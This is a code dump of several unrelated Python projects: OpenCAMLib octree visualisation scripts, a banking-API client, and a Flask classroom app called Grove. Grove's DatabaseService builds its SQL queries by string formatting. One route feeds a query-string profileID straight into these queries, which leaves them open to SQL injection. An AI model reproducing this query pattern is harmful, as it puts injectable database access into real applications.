tlist.append(ocl.Triangle(p1,p2,p4)) # 1,2,4,6
tlist.append(ocl.Triangle(p4,p6,p2))
if ( (i % (nmax/10))==0):
print ".",
i=i+1
#tlist.append(ocl.Triangle(p1,p2,p4))
#tlist.append(ocl.Triangle(p1,p3,p5))
#tlist.append(ocl.Triangle(p2,p3,p7))
#tlist.append(ocl.Triangle(p2,p7,p8))
#tlist.append(ocl.Triangle(p3,p7,p8))
print "done"
surf = camvtk.STLSurf(triangleList=tlist)
surf.SetColor(color)
surf.SetOpacity(opacity)
myscreen.addActor(surf)
def drawBB( myscreen, vol ):
lines = []
lines.append( camvtk.Line(p1=(vol.bb.minx, vol.bb.miny, vol.bb.minz) , p2=(vol.bb.maxx, vol.bb.miny, vol.bb.minz)) )
lines.append( camvtk.Line(p1=(vol.bb.minx, vol.bb.maxy, vol.bb.minz) , p2=(vol.bb.maxx, vol.bb.maxy, vol.bb.minz)) )
lines.append( camvtk.Line(p1=(vol.bb.minx, vol.bb.maxy, vol.bb.maxz) , p2=(vol.bb.maxx, vol.bb.maxy, vol.bb.maxz)) )
lines.append( camvtk.Line(p1=(vol.bb.minx, vol.bb.miny, vol.bb.maxz) , p2=(vol.bb.maxx, vol.bb.miny, vol.bb.maxz)) )
lines.append( camvtk.Line(p1=(vol.bb.minx, vol.bb.miny, vol.bb.minz) , p2=(vol.bb.minx, vol.bb.miny, vol.bb.maxz)) )
lines.append( camvtk.Line(p1=(vol.bb.maxx, vol.bb.miny, vol.bb.minz) , p2=(vol.bb.maxx, vol.bb.miny, vol.bb.maxz)) )
lines.append( camvtk.Line(p1=(vol.bb.minx, vol.bb.maxy, vol.bb.minz) , p2=(vol.bb.minx, vol.bb.maxy, vol.bb.maxz)) )
lines.append( camvtk.Line(p1=(vol.bb.maxx, vol.bb.maxy, vol.bb.minz) , p2=(vol.bb.maxx, vol.bb.maxy, vol.bb.maxz)) )
lines.append( camvtk.Line(p1=(vol.bb.minx, vol.bb.miny, vol.bb.minz) , p2=(vol.bb.minx, vol.bb.maxy, vol.bb.minz)) )
lines.append( camvtk.Line(p1=(vol.bb.maxx, vol.bb.miny, vol.bb.minz) , p2=(vol.bb.maxx, vol.bb.maxy, vol.bb.minz)) )
lines.append( camvtk.Line(p1=(vol.bb.minx, vol.bb.miny, vol.bb.maxz) , p2=(vol.bb.minx, vol.bb.maxy, vol.bb.maxz)) )
lines.append( camvtk.Line(p1=(vol.bb.maxx, vol.bb.miny, vol.bb.maxz) , p2=(vol.bb.maxx, vol.bb.maxy, vol.bb.maxz)) )
for l in lines:
myscreen.addActor(l)
def main(filename="frame/f.png",yc=6, n=0):
f=ocl.Ocode()
f.set_depth(9)
f.set_scale(5)
myscreen = camvtk.VTKScreen()
myscreen.camera.SetPosition(50, 22, 40)
myscreen.camera.SetFocalPoint(0,0, 0)
myscreen.camera.Azimuth( n*0.5 )
# box around octree
oct_cube = camvtk.Cube(center=(0,0,0), length=4*f.get_scale(), color=camvtk.white)
oct_cube.SetWireframe()
myscreen.addActor(oct_cube)
# screenshot writer
w2if = vtk.vtkWindowToImageFilter()
w2if.SetInput(myscreen.renWin)
lwr = vtk.vtkPNGWriter()
lwr.SetInput( w2if.GetOutput() )
arrowcenter=(1,2,0)
xar = camvtk.Arrow(color=camvtk.red, center=arrowcenter, rotXYZ=(0,0,0))
myscreen.addActor(xar)
yar = camvtk.Arrow(color=camvtk.green, center=arrowcenter, rotXYZ=(0,0,90))
myscreen.addActor(yar)
zar = camvtk.Arrow(color=camvtk.blue, center=arrowcenter, rotXYZ=(0,-90,0))
myscreen.addActor(zar)
"""
dl = myscreen.GetLights()
print "original default light:"
print dl
print "nextitem()"
l1 = dl.GetNextItem()
print " light:"
print l1
#print myscreen.GetLights()
lights = vtk.vtkLightCollection()
l = myscreen.MakeLight()
l2 = myscreen.MakeLight()
#myscreen.RemoveAllLights()
l.SetAmbientColor(0.5, 0.5, 0.5)
l.SetPosition(0,0,20)
l.SetConeAngle(360)
l2.SetPosition(0,0,-20)
l2.SetConeAngle(360)
l2.SetIntensity(0.5)
myscreen.AddLight(l)
myscreen.AddLight(l2)
#myscreen.SetLightCollection(lights)
llist = myscreen.GetLights()
li = llist.GetNextItem()
print " new list of lights:"
print li
#for li in llist:
# print li
print " newly created light:"
print l
dl = myscreen.GetLights()
print "NEW light:"
print dl
"""
t = ocl.LinOCT()
t2 = ocl.LinOCT()
t.init(0)
t2.init(1)
#drawTree2(myscreen, t, opacity=0.2)
#myscreen.render()
#myscreen.iren.Start()
#exit()
print " after init() t :", t.str()
print " after init() t2 :", t2.str()
# sphere
svol = ocl.SphereOCTVolume()
svol.radius=3.2
svol.center = ocl.Point(1,0,3)
svol.calcBB()
# cube
cube1 = ocl.CubeOCTVolume()
cube1.side=2.123
cube1.center = ocl.Point(0,0,0)
cube1.calcBB()
#cylinder
cylvol = ocl.CylinderOCTVolume()
cylvol.p2 = ocl.Point(3,4,-5)
cylvol.radius= 2
cylvol.calcBB()
# draw exact cylinder
cp = 0.5*(cylvol.p1 + cylvol.p2)
height = (cylvol.p2-cylvol.p1).norm()
cylvolactor = camvtk.Cylinder(center=(cp.x, cp.y, cp.z-float(height)/2), radius = cylvol.radius, height=height, rotXYZ=(90,0,0))
cylvolactor.SetWireframe()
#myscreen.addActor(cylvolactor)
c = ocl.CylCutter(2)
c.length = 3
print "cutter length=", c.length
p1 = ocl.Point(-1,-2,0)
p2 = ocl.Point(1,2.0,0)
g1vol = ocl.CylMoveOCTVolume(c, p1, p2)
cyl1 = camvtk.Cylinder(center=(p1.x,p1.y,p1.z), radius=c.radius,
height=c.length,
rotXYZ=(90,0,0), color=camvtk.grey)
cyl1.SetWireframe()
myscreen.addActor(cyl1)
cyl2 = camvtk.Cylinder(center=(p2.x,p2.y,p2.z), radius=c.radius,
height=c.length,
rotXYZ=(90,0,0), color=camvtk.grey)
cyl2.SetWireframe()
myscreen.addActor(cyl2)
startp = camvtk.Sphere(center=(p1.x,p1.y,p1.z), radius=0.1, color=camvtk.green)
myscreen.addActor(startp)
endp = camvtk.Sphere(center=(p2.x,p2.y,p2.z), radius=0.1, color=camvtk.red)
myscreen.addActor(endp)
t.build( g1vol )
t2.build( cube1)
print "calling diff()...",
dt = t2.operation(1,t)
print "done."
# set Cylinde bounding-box
"""
cylvol.bb.maxx = 1.23
cylvol.bb.minx = -0.2
cylvol.bb.maxy = 1.23
cylvol.bb.miny = -0.2
cylvol.bb.maxz = 1.23
cylvol.bb.minz = -0.2
"""
drawBB( myscreen, g1vol)
#print cylvol.bb.maxx
#print "t2 build()"
#t2.build(cube1)
#print " t2 after build() ", t2.size()
#t2.condense()
#print " t2 after condense() ", t2.size()
# original trees
drawTree2(myscreen,t,opacity=1, color=camvtk.green)
drawTree2(myscreen,t2,opacity=1, color=camvtk.cyan)
drawTree2(myscreen,dt,opacity=1, color=camvtk.cyan, offset=(5,0,0))
"""
for n in xrange(0,30):
tp = ocl.Point(2.5,2.5,2-n*0.3)
tpc = camvtk.black
if (cylvol.isInside(tp)):
tpc = camvtk.red
else:
tpc = camvtk.cyan
tp_sphere = camvtk.Sphere(center=(tp.x,tp.y,tp.z), radius=0.1, color= tpc)
myscreen.addActor(tp_sphere)
"""
#drawTree(myscreen,t2,opacity=1, color=camvtk.red)
#print " diff12()...",
#t3 = t2.operation(1,t)
#print "done."
#print " diff21()...",
#t4 = t2.operation(2,t)
#print "done."
#print " intersection()...",
#t5 = t2.operation(3,t)
#print "done."
#print " sum()...",
#t6 = t2.operation(4,t)
#print "done."
#print " difference 1-2 t3 (blue) =", t3.size()
#print " difference 2-1 t4 (yellow)=", t4.size()
#print " intersection t5 (pink) =", t5.size()
#print " union t6 (grey) =", t6.size()
#drawTree(myscreen,t3,opacity=1, color=camvtk.blue, offset=(0,15,0))
#drawTree(myscreen,t4,opacity=1, color=camvtk.yellow,offset=(0,-15,0))
#drawTree(myscreen,t5,opacity=1, color=camvtk.pink,offset=(-15,0,0))
#drawTree(myscreen,t6,opacity=1, color=camvtk.grey,offset=(-15,-15,0))
title = camvtk.Text()
title.SetPos( (myscreen.width-350, myscreen.height-30) )
title.SetText("OpenCAMLib " + datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"))
myscreen.addActor(title)
#st2 = camvtk.Text()
#ytext = "Linear OCTree set operations: difference, intersection, union"
#st2.SetText(ytext)
#st2.SetPos( (50, myscreen.height-30) )
#myscreen.addActor( st2)
#st3 = camvtk.Text()
#text = "Original OCTrees\n Ball:%d nodes\n Cube: %d nodes" % ( t.size(), t2.size() )
#st3.SetText(text)
#st3.SetPos( (50, 200) )
#myscreen.addActor( st3)
#st4 = camvtk.Text()
#un = " Union (grey): %d nodes\n" % (t6.size())
#int = " Intersection (pink): %d nodes\n" % (t5.size())
#diff1 = " difference Cube-Ball (blue): %d nodes\n" % (t3.size())
#diff2 = " difference Ball-Cube (yellow): %d nodes\n" % (t4.size())
#text= un+int+diff1+diff2
#st4.SetText(text)
#st4.SetPos( (50, 100) )
#myscreen.addActor( st4)
print " render()...",
myscreen.render()
print "done."
lwr.SetFileName(filename)
time.sleep(0.2)
#lwr.Write()
myscreen.iren.Start()
if __name__ == "__main__":
#Nsteps = 720
#ystart = 6
#ystop = -6
#ystep = float(ystop-ystart)/(Nsteps-1)
main()
#fiangle = fiangle + 2
```
#### File: src/attic/oct_test3.py
```python
import ocl as cam
import camvtk
import time
import vtk
import math
import datetime
red= (1,0,0)
green= (0,1,0)
blue= (0,0,1)
cyan= (0,1,1)
yellow= (1,1,0)
pink = ( float(255)/255,float(192)/255,float(203)/255)
grey = ( float(127)/255,float(127)/255,float(127)/255)
orange = ( float(255)/255,float(165)/255,float(0)/255)
#OCType = Enum('black', 'grey', 'white')
OCTMax = 8
def buildOCTree(volume, nodecenter=cam.Point(0,0,0), level=0):
# build octree of volume, return root node
node = OCTNode( level, center = nodecenter , type = 1, childlist=None)
flags = []
for n in xrange(0,9): # test all points
flags.append( volume.isInside( node.nodePoint(n) ) )
if (sum(flags) == 0): # nothing is inside
node.type = 0
#print "nothing inside!"
return node
if (sum(flags) == 9): # everything is inside
node.type = 2
#print "all inside!"
return node
if level== OCTMax: # reached max levels
return node #OCTNode(level, center= nodecenter, type = 2, childlist = None)
# have to subdivide:
childs = []
child_centers = []
for n in xrange(1,9):
child_center = node.childCenter(n)
childs.append( buildOCTree( volume , nodecenter = child_center, level= level+1) )
node.setChildren(childs)
return node
def searchOCTree(node, list):
# return list of nodes in the whole tree starting at node
if node.children is not None:
for chi in node.children:
searchOCTree(chi, list)
else:
list.append(node)
class Volume():
def __init__(self):
self.center = cam.Point(0,0,0)
self.radius = 0.45
def isInside(self, point):
p = point - self.center
if p.norm() < self.radius:
return 1
else:
return 0
def nodeColor(oct):
offset = 2
n = oct.level-offset
return (float(n)/(OCTMax-offset), float(OCTMax-offset - n)/(OCTMax-offset), 0)
def drawNode(myscreen, node):
if node.type == cam.OCType.BLACK:
return # don't draw intermediate nodes
if node.type == cam.OCType.GREY:
return # don't draw intermediate nodes
p = []
for n in xrange(1,9):
p1 = node.nodePoint(n)
p.append(p1)
lines = []
lines.append ( camvtk.Line(p1=(p[0].x,p[0].y,p[0].z),p2=(p[1].x,p[1].y,p[1].z)) )
lines.append ( camvtk.Line(p1=(p[0].x,p[0].y,p[0].z),p2=(p[2].x,p[2].y,p[2].z)) )
lines.append ( camvtk.Line(p1=(p[0].x,p[0].y,p[0].z),p2=(p[3].x,p[3].y,p[3].z)) )
lines.append ( camvtk.Line(p1=(p[2].x,p[2].y,p[2].z),p2=(p[4].x,p[4].y,p[4].z)) )
lines.append ( camvtk.Line(p1=(p[1].x,p[1].y,p[1].z),p2=(p[5].x,p[5].y,p[5].z)) )
lines.append ( camvtk.Line(p1=(p[1].x,p[1].y,p[1].z),p2=(p[6].x,p[6].y,p[6].z)) )
lines.append ( camvtk.Line(p1=(p[2].x,p[2].y,p[2].z),p2=(p[6].x,p[6].y,p[6].z)) )
lines.append ( camvtk.Line(p1=(p[6].x,p[6].y,p[6].z),p2=(p[7].x,p[7].y,p[7].z)) )
lines.append ( camvtk.Line(p1=(p[4].x,p[4].y,p[4].z),p2=(p[7].x,p[7].y,p[7].z)) )
lines.append ( camvtk.Line(p1=(p[4].x,p[4].y,p[4].z),p2=(p[3].x,p[3].y,p[3].z)) )
lines.append ( camvtk.Line(p1=(p[5].x,p[5].y,p[5].z),p2=(p[3].x,p[3].y,p[3].z)) )
lines.append ( camvtk.Line(p1=(p[5].x,p[5].y,p[5].z),p2=(p[7].x,p[7].y,p[7].z)) )
if node.type == cam.OCType.WHITE:
color = nodeColor(node)
if node.type == cam.OCType.GREY:
color = camvtk.white
if node.type == cam.OCType.BLACK:
color = camvtk.grey
for li in lines:
li.SetColor( color )
if node.type==cam.OCType.BLACK:
li.SetOpacity(0.1)
if node.type==cam.OCType.GREY:
li.SetOpacity(0.2)
myscreen.addActor(li)
def drawNode2(myscreen, node):
if node.type == cam.OCType.BLACK:
return # don't draw intermediate nodes
if node.type == cam.OCType.GREY:
return # don't draw intermediate nodes
p = []
for n in xrange(1,9):
p1 = node.nodePoint(n)
p.append(p1)
lines = []
for n in xrange(0,8):
lines.append ( camvtk.Point(center=(p[n].x,p[n].y,p[n].z) ) )
if node.type == cam.OCType.WHITE:
color = nodeColor(node)
if node.type == cam.OCType.GREY:
color = camvtk.white
if node.type == cam.OCType.BLACK:
color = camvtk.grey
for li in lines:
li.SetColor( color )
if node.type==cam.OCType.BLACK:
li.SetOpacity(0.1)
if node.type==cam.OCType.GREY:
li.SetOpacity(0.2)
myscreen.addActor(li)
def drawNode3(myscreen, node):
if node.type == cam.OCType.BLACK:
return # don't draw intermediate nodes
if node.type == cam.OCType.GREY:
return # don't draw intermediate nodes
if node.type == cam.OCType.WHITE:
ccolor = nodeColor(node)
if node.type == cam.OCType.GREY:
ccolor = camvtk.white
if node.type == cam.OCType.BLACK:
ccolor = camvtk.grey
cen = node.nodePoint(0)
cube = camvtk.Cube(center=(cen.x, cen.y, cen.z), length= node.scale, color=camvtk.green)
#cube.SetWireframe()
#cube.SetOpacity(0.2)
myscreen.addActor( cube )
def drawOCT(myscreen, oct, color, opacity=1.0):
nodes = oct.get_white_nodes()
for node in nodes:
cen = node.nodePoint(0)
cube = camvtk.Cube(center=(cen.x, cen.y, cen.z), length= node.scale, color=color)
cube.SetOpacity(opacity)
#cube.SetWireframe()
myscreen.addActor( cube )
if __name__ == "__main__":
#exit()
#oct = cam.OCTNode()
myscreen = camvtk.VTKScreen()
myscreen.camera.SetPosition(20, 12, 2)
myscreen.camera.SetFocalPoint(0,0, 0)
#print oct.str()
"""
print "max scale=", oct.get_max_scale()
for n in xrange(0,9):
p1 = oct.nodePoint(n)
myscreen.addActor( camvtk.Sphere(center=(p1.x, p1.y, p1.z), radius=0.1, color=camvtk.red))
print "id=%i" % (n),
print p1.str()
print "child centers:"
for n in xrange(1,9):
p1 = oct.childCenter(n)
myscreen.addActor( camvtk.Sphere(center=(p1.x, p1.y, p1.z), radius=0.1, color=camvtk.yellow))
print "id=%i" % (n),
print p1.str()
"""
xar = camvtk.Arrow(color=red, rotXYZ=(0,0,0))
myscreen.addActor(xar)
yar = camvtk.Arrow(color=green, rotXYZ=(0,0,90))
myscreen.addActor(yar)
zar = camvtk.Arrow(color=blue, rotXYZ=(0,-90,0))
myscreen.addActor(zar)
oc2 = cam.OCTest()
oc2.set_max_depth(5)
svol = cam.SphereOCTVolume()
svol.radius=3.1415
svol.center = cam.Point(-1,2,-1)
oc2.setVol(svol)
oc2.build_octree()
oc3 = cam.OCTest()
svol3 = cam.SphereOCTVolume()
svol3.radius=2
svol3.center = cam.Point(-1,2,1)
cvol = cam.CubeOCTVolume()
cvol.side = 3
cvol.center = cam.Point(2.0,2,-1)
oc3.setVol(cvol)
oc3.set_max_depth(5)
oc3.build_octree()
iters = oc3.prune_all()
iters = oc2.prune_all()
nlist = oc2.get_all_nodes()
print " oc2 got ", len(nlist), " nodes"
nlist = oc2.get_white_nodes()
print " oc2 got ", len(nlist), " white nodes"
nlist = oc3.get_all_nodes()
print " oc3 got ", len(nlist), " nodes"
print "calling balance"
oc2.balance(oc3)
print "after balance:"
nlist = oc2.get_all_nodes()
print " oc2 got ", len(nlist), " nodes"
nlist = oc2.get_white_nodes()
print " oc2 got ", len(nlist), " white nodes"
print "calling diff"
oc2.diff(oc3)
print "after diff:"
nlist = oc2.get_all_nodes()
print " oc2 got ", len(nlist), " nodes"
nlist = oc2.get_white_nodes()
print " oc2 got ", len(nlist), " white nodes"
drawOCT(myscreen, oc2, camvtk.green)
#drawOCT(myscreen, oc3, camvtk.red, opacity=0.1)
#exit()
#for node in nlist2:
# pass
#print node.str()
#p1 = node.nodePoint(0)
# drawNode3( myscreen, node )
#myscreen.addActor( camvtk.Sphere(center=(p1.x, p1.y, p1.z), radius=0.1, color=sph_color))
myscreen.render()
myscreen.iren.Start()
exit()
#oct = OCTNode(level=0)
testvol = Volume()
print "building tree...",
tree = buildOCTree(testvol)
print "done."
print tree
list =[]
searchOCTree(tree, list)
print len(list), " nodes in tree"
w2if = vtk.vtkWindowToImageFilter()
w2if.SetInput(myscreen.renWin)
lwr = vtk.vtkPNGWriter()
lwr.SetInput( w2if.GetOutput() )
w2if.Modified()
t = camvtk.Text()
t.SetPos( (myscreen.width-200, myscreen.height-30) )
myscreen.addActor( t)
t2 = camvtk.Text()
t2.SetPos( (myscreen.width-200, 30) )
myscreen.addActor( t2)
n = 0
for node in list:
addNodes(myscreen, node)
if (n%50) == 0:
nodetext = "Nodes: %5i" % (n)
t2.SetText(nodetext)
t.SetText("OpenCAMLib 10.03-beta " + datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"))
myscreen.render()
myscreen.camera.Azimuth( 3 )
print "frame %i of %i" % (n, len(list))
w2if.Modified()
lwr.SetFileName("frames/oct"+ ('%05d' % n)+".png")
#lwr.Write()
n = n +1
#time.sleep(0.1)
print "done!"
#raw_input("Press Enter to terminate")
``` |
{
"source": "johnyenter-briars/BudgetBattles",
"score": 3
} |
#### File: johnyenter-briars/BudgetBattles/APIConnectionService.py
```python
from models.ResponseModels import *
import requests
import json
class ApiConnectionService():
def __init__(self):
self._apiKey = open("apikey.txt").read()
self._baseurl = "http://api.reimaginebanking.com/"
def GetAllValidOpponents(self, initiator_id):
url = self._baseurl + "customers?key={0}".format(self._apiKey)
response = requests.get(
url,
headers={'content-type':'application/json'},
)
if response.status_code == 200:
customers = json.loads(response.text)
target_customers = [
customer for customer in customers
if customer['_id'] != initiator_id and self.GetAccountInformation(customer['_id']) != None]
return target_customers
else:
print(response.status_code)
return None
def SearchForCustomerId(self, customer_first: str, customer_last: str):
url = self._baseurl + "customers?key={0}".format(self._apiKey)
response = requests.get(
url,
headers={'content-type':'application/json'},
)
if response.status_code == 200:
customers = json.loads(response.text)
target_customers = [customer for customer in customers if customer['first_name'] == customer_first and customer['last_name'] == customer_last]
if len(target_customers) == 1:
return target_customers[0]['_id']
else:
print("Duplicate customers in database!")
return None
else:
print(response.status_code)
return None
def GetCustomerInformation(self, customer_id: str) -> GetCustomerInfoResponse:
url = self._baseurl + "customers/{0}?key={1}".format(customer_id, self._apiKey)
response = requests.get(
url,
headers={'content-type':'application/json'},
)
if response.status_code == 200:
return GetCustomerInfoResponse(response)
else:
print(response.status_code)
def GetAccountInformation(self, customer_id: str) -> GetCustomerAccountResponse:
url = self._baseurl + "customers/{0}/accounts?key={1}".format(customer_id, self._apiKey)
response = requests.get(
url,
headers={'content-type':'application/json'},
)
if json.loads(response.text) == []:
return None
elif response.status_code == 200:
print("This person has an account!")
return GetCustomerAccountResponse(response)
else:
return None
def GetAllWithdrawals(self, customer_id):
account_id = self.GetAccountInformation(customer_id).get_account_number()
url = self._baseurl + "accounts/{0}/withdrawals?key={1}".format(account_id, self._apiKey)
response = requests.get(
url,
headers={'content-type':'application/json'},
)
if response.status_code == 200:
return GetAllWithdrawalsResponse(response)
else:
print(response.status_code)
def GetAllDeposits(self, customer_id):
account_id = self.GetAccountInformation(customer_id).get_account_number()
url = self._baseurl + "accounts/{0}/deposits?key={1}".format(account_id, self._apiKey)
response = requests.get(
url,
headers={'content-type':'application/json'},
)
if response.status_code == 200:
return GetAllDepositsResponse(response)
else:
print(response.status_code)
``` |
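A minimal usage sketch for the service above — hypothetical: it assumes a valid Nessie API key sits in apikey.txt, that the module is importable as `APIConnectionService`, and that the customer name below is a placeholder.
```python
# Hypothetical usage of ApiConnectionService; the name below is a placeholder.
from APIConnectionService import ApiConnectionService

service = ApiConnectionService()

customer_id = service.SearchForCustomerId("Jane", "Doe")  # example name only
if customer_id is not None:
    account = service.GetAccountInformation(customer_id)
    if account is not None:
        print("account:", account.get_account_number())
    opponents = service.GetAllValidOpponents(customer_id)
    print(len(opponents), "possible opponents")
```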
{
"source": "johnyenter-briars/Grove",
"score": 2
} |
#### File: Grove/app/award.py
```python
from flask import Flask, request, redirect, render_template, json, session, jsonify,url_for
from app import app, database
from datetime import datetime
from time import gmtime, strftime
@app.route('/award')
def awardapplespage():
sess = json.loads(session['user_auth'])
if not sess:
return redirect('/')
first = sess.get('_FirstName')
last = sess.get('_LastName')
projectID = sess.get('_ProjectID')
profileID = sess.get('_StudentID')
visibleStudents = []
validPage = 0
if session['user_type'] == "STUDENT":
validPage = 10 - database.getStudent(profileID).getApplesAwarded()
for student in database.getStudentsOnProject(projectID):
if(student.getStudentID() != profileID):
visibleStudents.append(student)
elif session['user_type'] == "TEACHER":
for project in database.getProjectsForTeacher(sess.get('_TeacherID')):
visibleStudents += database.getStudentsOnProject(project.getProjectID())
validPage = len(visibleStudents)
possibleApples = database.getValidAppleTypes()
return render_template("awardapples.html", projectID=projectID,
name='{} {}'.format(first, last),profileID=profileID,
visibleStudents=visibleStudents, possibleApples=possibleApples, validPage = validPage)
@app.route('/awardapples', methods=['POST'])
def awardapple():
sess = json.loads(session['user_auth'])
if not sess:
return redirect('/')
student = sess.get('_StudentID')
if(student != None ):
appleNumber = database.getStudent(student).getApplesAwarded()
if(appleNumber == 0):
time = strftime("%Y-%m-%d %H:%M:%S", gmtime())
database.insertAward(student, "Red", "Being Humble", time)
for key,value in request.form.items():
targetProject = database.getStudentProject(int(key))
if(student != None):
database.updateAwardedApples(student)
database.insertAward(int(key), value, targetProject.getProjectName(), strftime("%Y-%m-%d %H:%M:%S", gmtime()))
return redirect(url_for("awardapplespage"))
```
#### File: Grove/app/profile.py
```python
from flask import Flask, request, redirect, render_template, json, session, jsonify,url_for
from app import app, database
from exceptions.NoProfileIDException import NoProfileIDException
from time import gmtime, strftime
@app.route('/profile/')
def profile():
if request.args.get('profileID') == None:
raise NoProfileIDException
sess = json.loads(session['user_auth'])
if not sess:
return redirect('/')
ufirst = sess.get('_FirstName')
ulast = sess.get('_LastName')
userName = ufirst + ' ' + ulast
profileID = sess.get('_StudentID')
projectID = sess.get('_ProjectID')
currentProfileID = request.args.get('profileID')
sess = json.loads(session['user_auth'])
studentID = sess.get('_StudentID')
teacherID = sess.get('_TeacherID')
branches = database.getBranchesForStudent(currentProfileID)
awards = database.getAwardsForStudent(currentProfileID)
tasks = database.getTasksForStudent(currentProfileID)
first = database.getStudent(currentProfileID).getFirstName()
last = database.getStudent(currentProfileID).getLastName()
targetProjectID = database.getStudentProject(currentProfileID).getProjectID()
return render_template("profile.html",
targetProfileName=first+' '+last, branches=branches,
awards=awards, tasks=tasks, projectID=projectID,
studentID=studentID, teacherID=teacherID,
profileID=sess.get('_StudentID'),
targetProjectID=targetProjectID,
name='{} {}'.format(sess.get('_FirstName'), sess.get('_LastName')))
```
#### File: johnyenter-briars/Grove/app.py
```python
from app import app
@app.shell_context_processor
def make_shell_context():
return None
```
#### File: Grove/app/teacherconsole.py
```python
from flask import Flask, request, redirect, render_template, json, session, jsonify,url_for
from app import app, database
@app.route('/teacherconsole')
def teacherconsole():
sess = json.loads(session['user_auth'])
if not sess:
return redirect('/')
first = sess.get('_FirstName')
last = sess.get('_LastName')
tasksToReview = database.getTasksToBeReviewed()
studentID = sess.get('_StudentID')
teacherID = sess.get('_TeacherID')
students = database.getClassList(teacherID)
projects = [project for project in database.getProjects() if project.getTeacherID() == teacherID]
return render_template("teacherconsole.html", name='{} {}'.format(first, last), teacherID=teacherID, studentID=studentID, students=students, projects=projects, tasksToReview=tasksToReview,database=database)
@app.route('/addstudent/', methods=['POST', 'GET'])
def addStudent():
if request.method == 'POST':
fname = request.form['studentFName']
lname = request.form['studentLName']
projID = request.form['projectID']
database.insertNewStudent(
fname, lname,
int(json.loads(session['user_auth']).get('_TeacherID')),
int(projID), "perm0")
return render_template("teacherconsole.html",
name = json.loads(session['user_auth']).get('_FirstName'))
```
#### File: Grove/exceptions/NoProfileIDException.py
```python
class NoProfileIDException(Exception):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._messageString = "The user navigated to a page without providing a profileID in the query string"
```
#### File: Grove/exceptions/NoTaskIDException.py
```python
class NoTaskIDException(Exception):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._messageString = "The user navigated to a page without providing a taskID in the query string"
def getMessageString(self):
return self._messageString
```
#### File: Grove/models/Apple.py
```python
class Apple(object):
def __init__(self, appleTuple):
super().__init__()
self._AppleType = appleTuple[0]
def getAppleType(self):
return self._AppleType
```
#### File: Grove/models/Project.py
```python
class Project(object):
def __init__(self, projectTuple):
super().__init__()
self._ProjectID = projectTuple[0]
self._TeacherID = projectTuple[1]
self._GrowthStatus = projectTuple[2]
self._ProjectName = projectTuple[3]
self._ProjectDescription = projectTuple[4]
def getProjectID(self):
return self._ProjectID
def getTeacherID(self):
return self._TeacherID
def getGrowthStatus(self):
return self._GrowthStatus
def getProjectName(self):
return self._ProjectName
def getProjectDesc(self):
return self._ProjectDescription
```
#### File: Grove/models/TaskReview.py
```python
class TaskReview(object):
def __init__(self, taskTuple):
super().__init__()
self._ReviewID = taskTuple[0]
self._TaskID = taskTuple[1]
self._Resolved = taskTuple[2]
self._Rating = taskTuple[3]
def getTaskID(self):
return self._TaskID
def getReviewID(self):
return self._ReviewID
def getResolved(self):
return self._Resolved == 1
def getRating(self):
return self._Rating
```
#### File: Grove/models/Teacher.py
```python
class Teacher(object):
def __init__(self, teacherTuple):
super().__init__()
self._TeacherID = teacherTuple[0]
self._FirstName = teacherTuple[1]
self._LastName = teacherTuple[2]
self._PermissionLevel = teacherTuple[3]
def getTeacherID(self):
return self._TeacherID
def getFirstName(self):
return self._FirstName
def getLastName(self):
return self._LastName
def getPermissionLevel(self):
return self._PermissionLevel
```
#### File: Grove/services/DatabaseService.py
```python
import sqlite3
from models.Student import Student
from models.Teacher import Teacher
from models.Project import Project
from models.UserCredentials import UserCredentials
from models.Branch import Branch
from models.Award import Award
from services.FlattenerService import BranchFlattener
from models.Files import Files
from models.Task import Task
from models.Chat import Chat
from models.TaskReview import TaskReview
from models.Goal import Goal
from models.Apple import Apple
from models.MessageNotifications import MessageNotifications
import os
DATABASE_PATH = 'database_files/Grove.db'
class DatabaseService(object):
def __init__(self):
super().__init__()
self._db = None
self.set_db()
def set_db(self):
self._db = sqlite3.connect(DATABASE_PATH, check_same_thread=False)
def get_db(self):
return self._db
def getValidAppleTypes(self):
return [Apple(tuple) for tuple in self._db.execute("select * from AppleType;").fetchall()]
def getUserCredentials(self):
return [UserCredentials(tuple) for tuple in self._db.execute("select * from UserCredentials;").fetchall()]
def getStudents(self):
return [Student(tuple) for tuple in self._db.execute("select * from Student;").fetchall()]
def getTeachers(self):
return [Teacher(tuple) for tuple in self._db.execute("select * from Teacher;").fetchall()]
def getStudentProject(self, StudentID):
return [Project(tuple) for tuple in
self._db.execute("""select * from Project where ProjectID =
(select ProjectID from Student where StudentID = {id});""".format(id=StudentID))
.fetchall()][0]
def getStudent(self, StudentID):
return [Student(tuple) for tuple in self._db.execute(
"""select * from Student where StudentID={id};""".format(id=StudentID)).fetchall()][0]
def getTeacher(self, TeacherID):
return [Teacher(tuple) for tuple in self._db.execute(
"""select * from Teacher where TeacherID={id};""".format(id=TeacherID)).fetchall()][0]
def getBranchesForProject(self, ProjectID):
return BranchFlattener(
self._db.execute("""select * from Branch where ProjectID={id};"""
.format(id=ProjectID)).fetchall()).flatten()
def getBranchesForStudent(self, StudentID):
return BranchFlattener(
self._db.execute("""select * from Branch where StudentID={id};"""
.format(id=StudentID)).fetchall()).flatten()
def getTask(self, TaskID):
return [Task(tuple) for tuple in self._db.execute("""
select * from Task where TaskID={id};"""
.format(id=TaskID)).fetchall()][0]
def getTasksForBranch(self, BranchID, ProjectID):
return [Task(tuple) for tuple in self._db.execute("""
select * from Task where BranchID={bid} and ProjectID={pid};"""
.format(bid=BranchID, pid=ProjectID)).fetchall()]
def getTasksForProject(self, ProjectID):
return [Task(tuple) for tuple in self._db.execute("""
select * from Task where ProjectID={pid};"""
.format(pid=ProjectID)).fetchall()]
def getAwardsForStudent(self, StudentID):
return [Award(tuple) for tuple in self._db.execute(
"""select * from Award where StudentID={id};""".format(id=StudentID)).fetchall()]
def getTasksForStudent(self, StudentID):
return [Task(tuple) for tuple in self._db.execute(
"""select * from Task where StudentID={id};""".format(id=StudentID)).fetchall()]
def getProjectsForTeacher(self, TeacherID):
return [Project(tuple) for tuple in self._db.execute("""
select * from Project where TeacherID={id};"""
.format(id=TeacherID)).fetchall()]
def getClassList(self, TeacherID):
return [Student(tuple) for tuple in self._db.execute(
"""select * from Student where TeacherID={id};""".format(id=TeacherID)).fetchall()]
def getProject(self, ProjectID):
return [Project(tuple) for tuple in self._db.execute("""
select * from Project where ProjectID={id}"""
.format(id=ProjectID)).fetchall()][0]
def getStudentsOnProject(self, ProjectID):
